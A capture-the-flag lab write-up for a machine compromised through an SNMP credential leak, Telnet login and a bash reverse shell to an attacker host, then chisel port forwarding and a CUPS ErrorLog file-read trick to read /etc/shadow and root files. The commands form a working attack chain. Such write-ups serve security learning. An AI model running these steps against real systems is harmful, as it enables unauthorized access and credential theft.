This machine exposes an SNMP service that leaks credentials. Access is obtained through Telnet, followed by a reverse shell. Privilege escalation is achieved by forwarding the local CUPS service (port 631) and abusing a file‑read vulnerability to retrieve root files.
Target: 10.10.11.X
Main vector: SNMP information leak
Privilege escalation: CUPS (< 1.6.2) arbitrary file read
UDP top ports scan:
$ nmap -sU --top-ports 100 --open -T5 -n IP -> Port 161/udp open (SNMP)
SNMP community discovery:
$ onesixtyone -c /usr/share/wordlists/snmp.txt IP -> public
SNMP walk:
$ snmpwalk -c public -v 2c IP 1 -> Hexadecimal data containing a password
Decode the leaked value:
$ echo "HEX_DATA" | xargs | xxd -ps -r -> password
Telnet access:
$ telnet IP Password: (from SNMP)
Reverse shell:
exec bash -c "bash -i &> /dev/tcp/KALI_IP/PORT 0>&1"
Listener:
$ nc -nlvp PORT
TTY fix:
$ which python3
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
$ stty raw -echo; fg
$ reset
$ export TERM=xterm
$ export SHELL=bash
Foothold user flag is accessible at this point.
Basic checks:
$ sudo -l $ find / -perm -4000 2>/dev/null $ getcap -r / 2>/dev/null
Local port scan:
$ netstat -nat -> Port 631 (CUPS) open locally
CUPS is not exposed externally, so port forwarding is required. Chisel is used to forward port 631 to the attacker machine.
On attacker:
$ ./chisel server --reverse -p 1234
On victim:
$ wget http://KALI_IP/chisel $ chmod +x chisel $ ./chisel client KALI_IP:1234 R:631:127.0.0.1:631
Once the tunnel is active, access CUPS from the browser:
http://localhost:631
CUPS versions < 1.6.2 allow arbitrary file read by modifying the ErrorLog path.
Update ErrorLog:
$ cupsctl ErrorLog="/etc/shadow"
Read the file:
$ curl http://localhost:631/admin/log/error_log?
The same method can be used to read /root/root.txt or any other file.
The machine relies on weak SNMP configuration to leak credentials, followed by a simple Telnet foothold. Privilege escalation is achieved by exposing the local CUPS service and abusing its file‑read vulnerability to retrieve root files directly.